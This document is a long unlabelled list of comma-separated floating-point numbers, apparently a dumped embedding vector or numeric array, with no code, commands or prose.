0.0195861104875803, 0.022396478801965714, -0.013612274080514908, 0.025624800473451614, -0.0017456714995205402, -0.030524931848049164, -0.027224548161029816, 0.028881946578621864, 0.026330996304750443, 0.023304443806409836, 0.017856651917099953, -0.033061470836400986, -0.05312317982316017, 0.03291734680533409, 0.010196595452725887, -0.004943367093801498, 0.0423428937792778, -0.006438627373427153, -0.012120616622269154, 0.042890556156635284, -0.030582578852772713, -0.050413697957992554, -0.03683745115995407, -0.03548270836472511, 0.03845161199569702, 0.0029004449024796486, -0.015075107105076313, -0.023693572729825974, -0.013691541738808155, 0.019975237548351288, 0.024284470826387405, 0.0011340558994561434, -0.05116312950849533, -0.03559800609946251, 0.033090293407440186, 0.02414034865796566, 0.02353503927588463, -0.02223794534802437, -0.005163152236491442, 0.030092567205429077, -0.01336726825684309, -0.019297868013381958, -0.017856651917099953, -0.024053875356912613, 0.009050829336047173, -0.006813343148678541, -0.027498379349708557, 0.005491028539836407, -0.022915316745638847, 0.021445278078317642, 0.0040281955152750015, 0.013900517486035824, -0.02571127377450466, -0.015291289426386356, -0.011645016260445118, 0.01593983732163906, -0.03369560465216637, 0.030813174322247505, 0.010564104653894901, 0.02313149906694889, 0.015276877209544182, -0.043899405747652054, -0.010261449962854385, 0.04433177039027214, -0.0021654253359884024, 0.011681046336889267, 0.018101658672094345, -0.050384871661663055, 0.011983701959252357, -0.03882632777094841, -0.00570360803976655, -0.02346297726035118, 0.0013322229497134686, -0.017842240631580353, 0.012632247991859913, -0.010492044501006603, 0.00496858824044466, 0.013583450578153133, 0.003529174951836467, -0.03853808715939522, -0.021661460399627686, -0.033407360315322876, 0.019341103732585907, 0.0008449121960438788, -0.04271760955452919, -0.04185288026928902, -0.008877883665263653, -0.04865541309118271, 0.003801204264163971, 0.01387889962643385, 0.016184842213988304, -0.015810126438736916, -0.025552740320563316, -0.018461963161826134, 0.034762103110551834, -0.02179116941988468, -0.015723655000329018, 0.019427577033638954, 0.011608986184000969, 0.02027789317071438, -0.03159143030643463, 0.0021834406070411205, 0.004990206565707922, -0.010960439220070839, -0.03389737382531166, -0.0035634038504213095, -0.07079247385263443, -0.011183827184140682, -0.019139332696795464, 0.003851646790280938, -0.011522512882947922, 0.0036516780965030193, 0.007119601592421532, -0.04920307546854019, -0.020998500287532806, -0.0001401806657668203, 0.03283087536692619, 0.0026608428452163935, 0.008243748918175697, -0.016184842213988304, 0.001011552638374269, -0.007047540508210659, 0.021445278078317642, -0.027829859405755997, -0.031793199479579926, -0.06935126334428787, -0.0031094211153686047, -0.020969675853848457, -0.008560816757380962, 0.00948319397866726, -0.009893939830362797, 0.012740339152514935, 0.005372128449380398, -0.0211858581751585, -0.03141848370432854, -0.007065556012094021, 0.008524785749614239, -0.006128766108304262, -0.004983000457286835, 0.03038080967962742, -0.006431421265006065, -0.024298882111907005, 0.010708226822316647, 0.018173718824982643, -0.0212435070425272, 0.01175310742110014, 0.013338443823158741, 0.033465009182691574, -0.06767944991588593, 0.015853364020586014, -0.0018609686521813273, -0.007422256749123335, 0.04340939223766327, -0.044562362134456635, 0.002662644488736987, 0.01059292908757925, -0.006042293272912502, -0.019038448110222816, -0.016804564744234085, 0.0011313536670058966, -0.017842240631580353, 0.015003046952188015, -0.009375102818012238, 0.015118343755602837, 0.02801721729338169, 0.015810126438736916, 0.02474565990269184, 0.0060494993813335896, 0.071772500872612, -0.025581564754247665, -0.006644000764936209, -0.00545139517635107, -0.009893939830362797, -0.02735425904393196, 0.022310005500912666, -0.0071448227390646935, 0.01661720685660839, -0.012841224670410156, 0.012610630132257938, -0.0010998271172866225, 0.02445741556584835, 0.02738308347761631, -0.01127030048519373, -0.0006341345724649727, -0.0261148139834404, -0.00018161560001317412, -0.03620331734418869, -0.01890873908996582, 0.045196499675512314, -0.01690545119345188, -0.0006075621349737048, -0.051047831773757935, 0.021402040496468544, -0.017366638407111168, -0.010953232645988464, -0.022353243082761765, -0.03807689622044563, -0.007191662210971117, 0.036030370742082596, 0.010405571199953556, -0.03430091217160225, -0.0004548834403976798, -0.0310149434953928, -0.012488126754760742, -0.04075755551457405, 0.02189205400645733, 0.03695274889469147, -0.014145524241030216, -0.03548270836472511, 0.018375489860773087, -0.02572568506002426, -0.01761164516210556, 0.009648934006690979, -0.012185472063720226, -0.034790925681591034, -0.006287300027906895, -0.03360912948846817, -0.06347110122442245, -0.0554579496383667, 0.001906006713397801, 0.032081443816423416, -0.013251970522105694, -0.029602553695440292, -0.007602408528327942, -0.026893069967627525, 0.009079653769731522, 0.018015185371041298, -0.022252358496189117, 0.026287758722901344, 0.009331866167485714, 0.03934516757726669, 0.03291734680533409, 0.0008557213586755097, -0.0016438857419416308, 0.02083996683359146, 0.01857725903391838, 0.04637829586863518, -0.05064428970217705, -0.034099142998456955, -0.02635982073843479, 0.02869458869099617, 0.007115998305380344, -0.035770952701568604, -0.034675631672143936, 0.013215940445661545, 0.040267542004585266, 0.0008584235911257565, -0.042832907289266586, 0.010434395633637905, -0.012999758124351501, -0.03554035723209381, -0.014152729883790016, -0.03190849721431732, 0.023045025765895844, -0.019773468375205994, 0.006726870313286781, -0.04358233883976936, -0.034675631672143936, 0.011025293730199337, 0.03775982931256294, -0.003451709635555744, 0.013324031606316566, -0.017799003049731255, -0.009375102818012238, 0.014750834554433823, -0.03876867890357971, -0.007487111259251833, 0.018000774085521698, -0.013381680473685265, 0.001063796691596508, 0.0007215081714093685, 0.0008782403310760856, -0.01789988949894905, 0.02245412766933441, -0.04634946957230568, -0.021632635965943336, -0.02089761570096016, 0.04859776422381401, 0.00692864041775465, 0.000916072225663811, 0.01732340268790722, 0.001189002301543951, -0.010492044501006603, -0.03882632777094841, 0.0006836762768216431, -0.04303467646241188, -0.019686995074152946, 0.014354499988257885, -0.026518354192376137, -0.0456288643181324, 0.037068046629428864, 0.05744682624936104, 0.004810054786503315, 0.007616820745170116, -0.024197997525334358, -0.0024248440749943256, 0.053007882088422775, 0.03654921054840088, 0.011846786364912987, -0.03153378143906593, -0.041305217891931534, -0.009526430629193783, -0.00784020870923996, 0.00579368369653821, 0.025869807228446007, -0.0029725057538598776, 0.0007242104620672762, -0.009569666348397732, -0.03424326702952385, 0.02147410251200199, 0.014145524241030216, 0.0066728247329592705, -0.04407235234975815, -0.02806045301258564, 0.027613677084445953, 0.07563495635986328, 0.00928142387419939, -0.023232383653521538, 0.005761256441473961, -0.03675097972154617, -0.009245393797755241, -0.00740784453228116, 0.004640711937099695, 0.02837751992046833, -0.003844440681859851, -0.012877254746854305, -0.016847802326083183, -0.011544130742549896, -0.08347516506910324, 0.028132515028119087, -0.02190646529197693, 0.01434008777141571, 0.004251583945006132, 0.0018366482108831406, 0.006409802939742804, 0.004269598983228207, -0.02220912091434002, 0.003240932011976838, -0.006402597296983004, -0.021675871685147285, 0.014109493233263493, 0.007299753371626139, 0.027512792497873306, 0.013042994774878025, -0.03164907917380333, 0.003909295424818993, -0.023578274995088577, -0.015320113860070705, 0.028608115389943123, -0.03954693675041199, -0.00539734959602356, -0.008157276548445225, -0.0114144217222929, 0.0022879287134855986, 0.0012070174561813474, 0.034675631672143936, 0.0025437441654503345, -0.0035417855251580477, -0.007094379980117083, -0.02807486616075039, 0.014123905450105667, 0.009432751685380936, 0.011681046336889267, -0.003894883207976818, -0.02156057395040989, 0.03940281644463539, 0.013093437068164349, -0.010816317982971668, 0.008697731420397758, -0.03773100674152374, -0.0022681117989122868, 0.05133607238531113, 0.007926682010293007, 0.0005391044542193413, -0.004478575196117163, 0.0009917359566316009, 0.011039705947041512, 0.009497606195509434, -0.006982685998082161, -0.03528093919157982, 0.01565159298479557, -0.01828901655972004, 0.02706601470708847, -0.02474565990269184, 0.03804807364940643, 0.049145426601171494, 0.02285766787827015, -0.029746675863862038, -0.012826812453567982, 0.0179287139326334, -0.005631546955555677, -0.023088261485099792, -0.0048857182264328, -0.06981244683265686, 0.0077104996889829636, -0.005271243397146463, -0.03032316081225872, -0.010398365557193756, -0.020811142399907112, 0.008676113560795784, 0.0359438993036747, 0.01568041741847992, -0.022295594215393066, -0.029285486787557602, -0.02022024430334568, 0.0390569232404232, 0.011681046336889267, -0.012221502140164375, -0.01306461263448, -0.006319727282971144, -0.030150214210152626, -0.0061323693953454494, -0.03386855125427246, 0.016401024535298347, 0.0021618222817778587, 0.06064632162451744, -0.007883445359766483, 0.0060494993813335896, -0.021430864930152893, 0.047444794327020645, -0.01468597911298275, 0.003561602206900716, 0.0032463364768773317, 0.03816337138414383, -0.025495091453194618, -0.007573584094643593, 0.0068205492570996284, 0.006510687991976738, -0.01833225227892399, 0.014419354498386383, 0.02640305645763874, 0.028651351109147072, -0.02181999385356903, -0.02572568506002426, -0.018692556768655777, 0.0007444775546900928, -0.0000688517902744934, -0.018836678937077522, -0.025278909131884575, 0.032167915254831314, -0.007789766415953636, 0.020955264568328857, -0.005779271479696035, 0.016775740310549736, 0.000853019068017602, -0.0035147627349942923, 0.005019030999392271, -0.01725134253501892, -0.01759723387658596, 0.034790925681591034, -0.02963137812912464, 0.014440973289310932, 0.03196614608168602, -0.025956280529499054, 0.017395462840795517, -0.011673840694129467, -0.018159307539463043, -0.007854620926082134, -0.008668907918035984, -0.01075866911560297, -0.005991850979626179, -0.017510760575532913, 0.03294617310166359, -0.017049571499228477, -0.03173555061221123, 0.00422636279836297, -0.0072096772491931915, -0.02869458869099617, 0.02343415468931198, -0.024298882111907005, 0.011486482806503773, -0.008913913741707802, -0.007998742163181305, -0.007047540508210659, 0.008913913741707802, 0.015752479434013367, 0.034790925681591034, -0.02706601470708847, -0.0155074717476964, 0.031476132571697235, 0.07425139099359512, -0.032456159591674805, 0.029199013486504555, 0.01666044443845749, -0.005599119700491428, -0.007854620926082134, -0.019369928166270256, 0.011500895023345947, -0.0035886249970644712, 0.0010223618010059, -0.02543744258582592, 0.009000387042760849, 0.007224089466035366, 0.021690282970666885, 0.026576003059744835, -0.027556028217077255, 0.011688252910971642, 0.012423272244632244, 0.006060308311134577, 0.01833225227892399, 0.004334453959017992, 0.023261208087205887, 0.00017463471158407629, -0.019701408222317696, 0.018015185371041298, -0.0048604970797896385, 0.005595516879111528, 0.05133607238531113, 0.011940465308725834, 0.006910625379532576, -0.006290902849286795, -0.05960864573717117, -0.0030607799999415874, -0.015103931538760662, -0.010513662360608578, -0.0006571038975380361, 0.01323035266250372, 0.03334971144795418, 0.020998500287532806, -0.002747315913438797, -0.010989263653755188, -0.010124534368515015, -0.031764376908540726, -0.014239203184843063, -0.018447550013661385, 0.02215147204697132, -0.014123905450105667, -0.016112782061100006, -0.0069970982149243355, 0.04087285324931145, 0.004417323507368565, 0.01666044443845749, -0.014736422337591648, -0.005498234648257494, 0.00910847820341587, 0.019067272543907166, 0.004201141186058521, 0.01107573602348566, 0.007897857576608658, 0.03418561816215515, -0.0006706152926199138, -0.017510760575532913, -0.04297702759504318, 0.013021375983953476, -0.013561831787228584, -0.016040721908211708, 0.0456288643181324, 0.00400657719001174, 0.01302858255803585, 0.01127030048519373, -0.007472699042409658, 0.04006577283143997, -0.012509745545685291, -0.01240886002779007, -0.007616820745170116, 0.01598307304084301, -0.004691154230386019, -0.010996469296514988, 0.0008300496847368777, 0.01041277777403593, -0.0015574127901345491, 0.009036417119204998, -0.0244141798466444, 0.0037183344829827547, 0.009014799259603024, 0.015911012887954712, -0.000051765509851975366, 0.005173961166292429, -0.01286284253001213, 0.020436426624655724, 0.03654921054840088, -0.033378537744283676, 0.013778014108538628, 0.035396236926317215, 0.009166126139461994, 0.0025239274837076664, -0.004993809387087822, 0.016775740310549736, 0.02183440513908863, 0.005617134738713503, -0.014109493233263493, -0.03528093919157982, -0.018793441355228424, 0.020004061982035637, -0.030611403286457062, 0.019398752599954605, 0.01546423602849245, 0.007760941982269287, 0.012307975441217422, -0.007137616630643606, 0.004701963625848293, 0.00797712430357933, 0.0034066715743392706, 0.021747931838035583, -0.006395391188561916, -0.0038768679369241, -0.04118992015719414, -0.03141848370432854, 0.014916573651134968, -0.006337742321193218, -0.00815006997436285, 0.0036588842049241066, -0.0033742443192750216, -0.02088320441544056, -0.040238719433546066, -0.03986400365829468, -0.020667022094130516, -0.015305701643228531, 0.02148851379752159, 0.018000774085521698, -0.022281181067228317, 0.01106853038072586, -0.009980413131415844, -0.005166755523532629, 0.009324660524725914, 0.00042223092168569565, -0.038653381168842316, -0.0046479180455207825, -0.031476132571697235, -0.005818904843181372, 0.01987435296177864, -0.010124534368515015, 0.00013421312905848026, 0.015132755972445011, -0.04490825533866882, -0.024025052785873413, 0.014664361253380775, -0.01854843460023403, -0.010160564444959164, -0.008085215464234352, -0.015795715153217316, -0.019802292808890343, 0.0011547734029591084, 0.015219229273498058, -0.014621124602854252, -0.02866576425731182, 0.012531363405287266, 0.010708226822316647, 0.019816704094409943, -0.00006429169297916815, 0.027527203783392906, -0.011695458553731441, -0.011212651617825031, 0.003271557856351137, -0.0014177950797602534, 0.0061972239054739475, 0.02506272681057453, -0.007371813990175724, 0.020148184150457382, -0.026619238778948784, -0.0008922020788304508, 0.023679159581661224, -0.019024036824703217, -0.0024482638109475374, -0.039979301393032074, 0.01667485572397709, 0.01993200182914734, -0.00003543924685800448, -0.027152488008141518, -0.005213594995439053, -0.02347739040851593, 0.027527203783392906, -0.014477003365755081, -0.01450582779943943, -0.03822102025151253, 0.007465492933988571, 0.02053731121122837, -0.003203100059181452, 0.02248295210301876, -0.007022319361567497, 0.011839579790830612, 0.0025941866915673018, -0.02474565990269184, -0.03752923384308815, 0.013842868618667126, -0.00845272559672594, 0.01824578084051609, -0.0391433946788311, -0.015896599739789963, 0.056005608290433884, 0.019341103732585907, 0.00848875567317009, 0.025192435830831528, 0.025293320417404175, 0.0065539246425032616, -0.00784020870923996, 0.003381450427696109, -0.0060206749476492405, -0.037990424782037735, 0.00848875567317009, -0.01663162000477314, 0.03032316081225872, -0.009814673103392124, -0.02540861815214157, -0.02382328175008297, -0.015175992622971535, -0.006676428020000458, 0.007195265032351017, 0.02509155124425888, 0.00496498541906476, -0.0007264624000526965, 0.007998742163181305, -0.0019348309142515063, -0.0310149434953928, 0.015579532831907272, 0.0017753965221345425, 0.010196595452725887, 0.006298108957707882, 0.0162857286632061, -0.032110266387462616, 0.021661460399627686, -0.009267011657357216, -0.038595736026763916, -0.0006287299911491573, -0.03300382196903229, -0.029112540185451508, -0.007260120008140802, 0.004748803097754717, -0.023318856954574585, 0.012826812453567982, -0.026849832385778427, 0.028002804145216942, 0.008740968070924282, 0.002475286601111293, -0.0010268655605614185, 0.010520868934690952, -0.014102287590503693, -0.01454185787588358, -0.03481975197792053, 0.011472070589661598, -0.005653165280818939, 0.007375417277216911, 0.03980635479092598, 0.03239851072430611, 0.009944383054971695, 0.0011133385123685002, -0.02187764085829258, 0.006662015803158283, 0.00022350090148393065, 0.01957169733941555, -0.002201455645263195, -0.02836310863494873, 0.018346665427088737, 0.001222330378368497, 0.04294820502400398, -0.006665618624538183, 0.018476374447345734, -0.01481568906456232, 0.004608284682035446, -0.031101416796445847, -0.015118343755602837, -0.01791430078446865, 0.004698360338807106, -0.03401267156004906, 0.028896357864141464, -0.03484857454895973, 0.00326435174793005, 0.02444300428032875, -0.006424215156584978, -0.0033850534819066525, 0.0179287139326334, -0.019514048472046852, 0.014181554317474365, -0.003381450427696109, -0.05026957392692566, 0.0018825869774445891, 0.00980026088654995, -0.0122070899233222, -0.004435338545590639, -0.026576003059744835, -0.010088504292070866, -0.008258161135017872, 0.0002745063975453377, -0.017150456085801125, -0.005076679401099682, 0.006860182620584965, 0.013489771634340286, -0.010153358802199364, -0.004247980657964945, -0.019398752599954605, 0.011299124918878078, -0.004435338545590639, -0.0211714468896389, -0.001400680746883154, 0.008813029155135155, -0.04632064700126648, -0.0018177322344854474, -0.0017817019252106547, -0.007775354199111462, 0.007393432315438986, 0.01288446132093668, 0.03827866539359093, 0.014246408827602863, 0.022727958858013153, -0.02640305645763874, -0.014455385506153107, -0.014080669730901718, -0.006208032835274935, -0.04854011535644531, 0.01059292908757925, 0.002673453651368618, 0.010484837926924229, -0.041305217891931534, 0.010866760276257992, -0.023996228352189064, -0.004165111109614372, 0.0023203559685498476, -0.020652608945965767, 0.016040721908211708, -0.0260571651160717, 0.018519612029194832, 0.01255298126488924, -0.031476132571697235, -0.004586666356772184, 0.0001942262169905007, -0.015435411594808102, -0.01627131551504135, 0.005343304015696049, -0.005314480047672987, 0.023088261485099792, -0.02385210618376732, -0.03885515406727791, 0.0033616337459534407, 0.0007260119891725481, -0.008510373532772064, -0.012019732035696507, 0.026028340682387352, 0.023722397163510323, 0.0032463364768773317, -0.011846786364912987, -0.0014655353734269738, -0.016429848968982697, -0.002619408071041107, 0.0006462947931140661, -0.013352856040000916, -0.00692503759637475, -0.009058035910129547, 0.024933017790317535, -0.03533858805894852, 0.0066403974778950214, -0.021920878440141678, 0.007152028847485781, -0.030121391639113426, 0.03528093919157982, 0.0027419112157076597, -0.011003675870597363, -0.011522512882947922, 0.00831581000238657, -0.03190849721431732, 0.019960826262831688, -0.0003677349886856973, -0.04629182070493698, -0.02710925228893757, 0.0029616965912282467, 0.02673453651368618, 0.005065870471298695, -0.043236445635557175, 0.020349953323602676, 0.01193325873464346, -0.014311263337731361, -0.006355757359415293, -0.011493688449263573, -0.005411761812865734, -0.024342119693756104, 0.027224548161029816, 0.00587655371055007, 0.02344856597483158, -0.0060494993813335896, 0.007202471140772104, 0.015593945048749447, -0.029516080394387245, 0.0031148255802690983, -0.002547347219660878, -0.006662015803158283, 0.015911012887954712, -0.03542506322264671, -0.014231996610760689, -0.003887677099555731, 0.0036264569498598576, -0.013943754136562347, -0.010852348059415817, -0.0077969725243747234, -0.047819510102272034, 0.01991758868098259, 0.016876626759767532, -0.004557841923087835, -0.00814286433160305, 0.011659428477287292, 0.02320355921983719, -0.0003461167507339269, -0.002579774707555771, 0.016386613249778748, -0.003442702116444707, -0.016170430928468704, 0.0326867550611496, -0.02831987291574478, 0.017453111708164215, 0.03790394961833954, -0.014801276847720146, 0.038653381168842316, 0.019369928166270256, 0.030467282980680466, -0.014570682309567928, -0.028536055237054825, 0.029919620603322983, -0.027844270691275597, 0.00439930846914649, -0.0030175435822457075, -0.011508100666105747, -0.008359046652913094, 0.02121468260884285, 0.014376118779182434, -0.014613918960094452, 0.006903419271111488, 0.008762586861848831, 0.007523141801357269, -0.00496858824044466, -0.06231813132762909, 0.003044566372409463, -0.0035453885793685913, -0.008575228042900562, 0.02442859299480915, 0.029227837920188904, -0.017770178616046906, -0.007090777158737183, 0.005573898553848267, -0.00002606572161312215, 0.004381293430924416, 0.023664748296141624, 0.022900903597474098, -0.003455312689766288, -0.01593983732163906, 0.02284325659275055, 0.0032139092218130827, 0.035770952701568604, -0.013151085935533047, 0.024270057678222656, -0.014707597903907299, -0.023693572729825974, -0.028463993221521378, 0.010816317982971668, 0.0017880072118714452, -0.0005364021635614336, -0.0005021733231842518, -0.012646660208702087, 0.0012691698502749205, -0.0014709399547427893, 0.0014655353734269738, 0.01436891220510006, 0.02545185387134552, 0.002473484957590699, 0.022727958858013153, -0.008250955492258072, -0.008755380287766457, 0.011147797107696533, -0.00045916205272078514, 0.01700633578002453, -0.026590414345264435, 0.008106833323836327, -0.009382308460772038, 0.011356772854924202, 0.0028247812297195196, 0.001600649324245751, 0.019787879660725594, 0.0055126468650996685, 0.03545388579368591, -0.007310562301427126, 0.00016866717487573624, -0.02772897481918335, -0.01547864731401205, -0.013763601891696453, -0.013749189674854279, -0.02284325659275055, -0.023073850199580193, -0.026864245533943176, 0.005264037288725376, -0.01025424338877201, 0.0071448227390646935, -0.014916573651134968, 0.07805619388818741, -0.0016790153458714485, -0.005454998463392258, -0.022727958858013153, -0.0179287139326334, -0.008308603428304195, 0.010823523625731468, 0.0014159936690703034, 0.010326304472982883, -0.01889432780444622, 0.006662015803158283, 0.007083571050316095, -0.02968902699649334, 0.010376746766269207, 0.023996228352189064, 0.011774725280702114, -0.014397736638784409, -0.0056279441341757774, 0.02772897481918335, -0.01433288212865591, -0.011039705947041512, 0.023880930617451668, -0.0036480750422924757, -0.002947284374386072, 0.022266769781708717, 0.011594573967158794, 0.0022825240157544613, 0.0059522176161408424, -0.022036176174879074, 0.003403068520128727, 0.002718491479754448, 0.0017222517635673285, 0.002822979586198926, -0.03499269858002663, -0.007876239717006683, 0.011529718525707722, 0.001652893261052668, 0.002255501225590706, -0.025552740320563316, -0.03352265805006027, -0.008647289127111435, 0.007696087472140789, -0.00913730263710022, -0.0035309763625264168, 0.010117328725755215, -0.007551965769380331, 0.017092809081077576, 0.01756840944290161, -0.024601537734270096, -0.0014150928473100066, -0.01830342970788479, 0.004593872465193272, -0.027483968064188957, 0.022266769781708717, 0.0023762029595673084, -0.0005607226630672812, -0.000853019068017602, -0.00046524216304533184, -0.022915316745638847, 0.006788122002035379, -0.0003328305610921234, 0.002909452421590686, -0.012898873537778854, 0.005570295266807079, -0.012538569048047066, 0.010218213312327862, -0.029948445037007332, -0.015752479434013367, -0.01289166696369648, 0.015867775306105614, 0.009857909753918648, 0.024342119693756104, -0.005422570742666721, 0.00796991866081953, -0.0009151714621111751, -0.003635464468970895, -0.010434395633637905, 0.030870823189616203, -0.013698747381567955, -0.020076123997569084, 0.0017177480040118098, -0.0138572808355093, 0.020811142399907112, 0.020133771002292633, -0.006571939680725336, 0.006496276240795851, -0.031447310000658035, -0.02318914793431759, 0.013324031606316566, -0.0016240690601989627, -0.0359438993036747, 0.003862455952912569, 0.006200827192515135, -0.01450582779943943, 0.014736422337591648, 0.021733520552515984, 0.010513662360608578, -0.008301397785544395, -0.019715819507837296, 0.007018716540187597, 0.020609373226761818, -0.00709798326715827, 0.0012178266188129783, -0.004853290971368551, -0.03415679186582565, 0.005955820437520742, 0.007429462857544422, 0.00979305524379015, -0.0070259226486086845, 0.006784519180655479, 0.027844270691275597, -0.016040721908211708, -0.020076123997569084, -0.017496349290013313, 0.00879861693829298, -0.01666044443845749, 0.0013574442127719522, 0.003977753221988678, -0.011630604043602943, -0.03003491833806038, -0.021632635965943336, -0.005818904843181372, 0.006600764114409685, -0.02219470962882042, 0.017871065065264702, -0.005818904843181372, 0.015565120615065098, -0.0013862685300409794, 0.0195428729057312, -0.0051559461280703545, 0.02736867032945156, 0.009295836091041565, 0.012870049104094505, -0.018461963161826134, -0.0010719035053625703, 0.006762900855392218, -0.014231996610760689, 0.006622382439672947, -0.003974149934947491, 0.01694868691265583, -0.031850848346948624, 0.0066980463452637196, -0.01093161478638649, 0.0392298698425293, 0.015075107105076313, -0.004424529615789652, -0.006784519180655479, -0.013986990787088871, 0.016862213611602783, 0.01896638795733452, 0.01519040483981371, -0.018490787595510483, 0.0035886249970644712, 0.012041349895298481, -0.0002445561403874308, -0.017698118463158607, 0.03219674155116081, 0.0017699920572340488, -0.01519040483981371, 0.0196005217730999, -0.0045001935213804245, 0.002664445899426937, 0.02213706076145172, -0.018072834238409996, 0.023650335147976875, 0.02114262245595455, -0.0058044930920004845, -0.0063161239959299564, -0.028752237558364868, -0.007487111259251833, 0.0016745115863159299, -0.0005287457024678588, -0.02344856597483158, 0.011508100666105747, 0.016112782061100006, 0.024543888866901398, -0.0015565120847895741, 0.0021528147626668215, 0.028161339461803436, -0.005173961166292429, 0.010304686613380909, -0.007087174337357283, -0.0070619527250528336, -0.008863471448421478, 0.005667577497661114, -0.012596217915415764, 0.004910939838737249, -0.0030301541555672884, -0.004730787593871355, 0.006269284524023533, 0.020004061982035637, 0.042515840381383896, -0.024976253509521484, -0.031159065663814545, 0.00522440392524004, -0.02767132595181465, -0.0031148255802690983, -0.020724669098854065, 0.012617835775017738, -0.03435856103897095, -0.005415365099906921, -0.012610630132257938, 0.026518354192376137, -0.01725134253501892, -0.008409488946199417, -0.0357997789978981, -0.00595942372456193, 0.022569425404071808, 0.0030769938603043556, 0.013259177096188068, 0.006676428020000458, -0.01354741957038641, 0.02543744258582592, -0.010556899011135101, 0.011090148240327835, -0.014599506743252277, -0.014930985867977142, -0.0061035449616611, -0.007768148090690374, -0.0005737836472690105, 0.0011079339310526848, -0.016847802326083183, -0.01044880785048008, 0.022007351741194725, -0.014563476666808128, 0.007036731578409672, 0.028291048482060432, -0.03369560465216637, -0.003736349521204829, -0.0045037963427603245, -0.02966020256280899, -0.007688881363719702, 0.0036390675231814384, -0.012978140264749527, 0.0072060744278132915, -0.020998500287532806, -0.004017386585474014, -0.021041737869381905, 0.007566377986222506, -0.0089787682518363, 0.013504182919859886, -0.01254577562212944, -0.02027789317071438, -0.012163853272795677, -0.0063161239959299564, -0.00028373918030411005, -0.004543429706245661, 0.015766890719532967, 0.00718445610255003, 0.00003237103737774305, 0.005065870471298695, 0.012653866782784462, 0.01240886002779007, -0.021704696118831635, -0.015132755972445011, -0.000842209963593632, 0.0071772499941289425, -0.02582656964659691, 0.0007778056315146387, -0.016761329025030136, 0.031764376908540726, -0.01092440914362669, -0.019052861258387566, 0.016559557989239693, -0.010801905766129494, 0.0072060744278132915, -0.013468152843415737, 0.0036877086386084557, -0.01303578820079565, 0.02320355921983719, -0.007883445359766483, 0.012106205336749554, 0.018015185371041298, -0.025970691815018654, -0.021776756271719933, 0.007559171877801418, 0.017553996294736862, 0.00587655371055007, -0.029213424772024155, 0.007458286825567484, 0.0066403974778950214, 0.02412593737244606, 0.01862049661576748, 0.00422996561974287, 0.009130096063017845, -0.0010133541654795408, -0.027873095124959946, 0.018851090222597122, -0.010167771019041538, -0.03035198524594307, 0.010052473284304142, -0.0016862214542925358, -0.005764859262853861, -0.011789137497544289, 0.007202471140772104, 0.013979784213006496, 0.00948319397866726, 0.009151714853942394, 0.03721216693520546, 0.009223775006830692, -0.018087247386574745, 0.03069787658751011, 0.005945011507719755, -0.011536925099790096, -0.029919620603322983, -0.002082555554807186, 0.00019355065887793899, -0.009706581942737103, -0.01420317217707634, -0.009432751685380936, -0.0021546161733567715, -0.008330222219228745, -0.032744400203228, -0.01258180569857359, -0.014930985867977142, -0.0106145478785038, -0.023073850199580193, 0.01078749354928732, -0.005314480047672987, -0.0023762029595673084, -0.00013646503794007003, 0.002408630447462201, 0.0012664676178246737, 0.013669922947883606, -0.006633191369473934, 0.0012664676178246737, -0.02317473478615284, 0.008712143637239933, -0.02450065314769745, -0.008279778994619846, 0.025523915886878967, 0.004802848678082228, 0.009922764264047146, 0.021661460399627686, -0.036347437649965286, 0.005444189067929983, -0.00045060482807457447, -0.009245393797755241, 0.0023635923862457275, -0.012279151007533073, -0.023880930617451668, 0.03885515406727791, -0.007242104504257441, 0.008531992323696613, 0.009346278384327888, 0.006352154538035393, 0.03167790174484253, -0.021992938593029976, -0.021358804777264595, 0.0027545220218598843, 0.009014799259603024, -0.007926682010293007, 0.013352856040000916, -0.003812013426795602, -0.005890965927392244, 0.023621512576937675, 0.007195265032351017, 0.014073463156819344, 0.010528074577450752, -0.01798636093735695, -0.017698118463158607, 0.009014799259603024, -0.008957150392234325, 0.0013115055626258254, 0.0026085989084094763, -0.023952990770339966, 0.008243748918175697, 0.0023834090679883957, 0.007869033142924309, 0.016775740310549736, 0.00001914113454404287, 0.008820234797894955, 0.004846084862947464, -0.007724911905825138, 0.018779030069708824, -0.0015835348749533296, 0.034790925681591034, -0.015838950872421265, -0.02017700858414173, 0.0072889444418251514, -0.01660279557108879, 0.0026284155901521444, -0.0077104996889829636, 0.0013024979270994663, -0.033465009182691574, -0.017712531611323357, -0.005552280228585005, -0.011544130742549896, -0.0036048386245965958, 0.004716375842690468, 0.019643759354948997, -0.007768148090690374, 0.007202471140772104, 0.014786864630877972, -0.013806838542222977, -0.0007525843684561551, -0.017208104953169823, -0.006975479889661074, -0.016862213611602783, -0.020796731114387512, -0.007732118014246225, -0.0053108767606318, 0.0014934588689357042, 0.023996228352189064, 0.01730899140238762, 0.006265681702643633, -0.01451303344219923, -0.041939351707696915, 0.03196614608168602, -0.002314951503649354, 0.01027586217969656, 0.00021111546084284782, -0.017467524856328964, -0.03810572251677513, -0.020739082247018814, -0.015766890719532967, -0.01241606567054987, 0.060127485543489456, 0.02709483914077282, 0.0011953075882047415, -0.002983314683660865, 0.0048857182264328, -0.004165111109614372, -0.007897857576608658, -0.007847415283322334, 0.01484451349824667, -0.005696401931345463, 0.026849832385778427, -0.011003675870597363, 0.01664603129029274, 0.019326690584421158, 0.016761329025030136, -0.007137616630643606, -0.014347294345498085, 0.03173555061221123, -0.013965371996164322, -0.005087488330900669, -0.005674783606082201, -0.011962083168327808, 0.003912898246198893, 0.0009295836207456887, -0.008049185387790203, 0.008337427861988544, -0.008546404540538788, -0.007703293580561876, -0.003021146636456251, -0.013460947200655937, 0.018519612029194832, -0.0014286042423918843, -0.014087875373661518, 0.018995212391018867, -0.0006616077153012156, 0.01078749354928732, 0.023952990770339966, 0.003779585938900709, -0.01828901655972004, -0.003525571897625923, 0.003945325501263142, 0.0075303479097783566, -0.010066885501146317, 0.010917202569544315, -0.006330536212772131, 0.008769792504608631, -0.00797712430357933, 0.022324418649077415, -0.013187116011977196, 0.004219156689941883, 0.002041120547801256, -0.023664748296141624, -0.005253228358924389, 0.0019132127054035664, -0.003685906995087862, 0.00011186304618604481, -0.011025293730199337, -0.002473484957590699, 0.004456956870853901, -0.012610630132257938, -0.0031742758583277464, 0.0031958939507603645, 0.002801361493766308, 0.020695844665169716, 0.024241233244538307, 0.0010502852965146303, 0.007213280536234379, 0.0031202302780002356, 0.005772065371274948, 0.007854620926082134, -0.01627131551504135, 0.00012419218546710908, -0.022065000608563423, 0.002145608654245734, -0.011371185071766376, -0.0032805653754621744, 0.008704937994480133, 0.011176621541380882, 0.0029761088080704212, 0.016184842213988304, 0.02866576425731182, 0.010722639039158821, 0.009238187223672867, 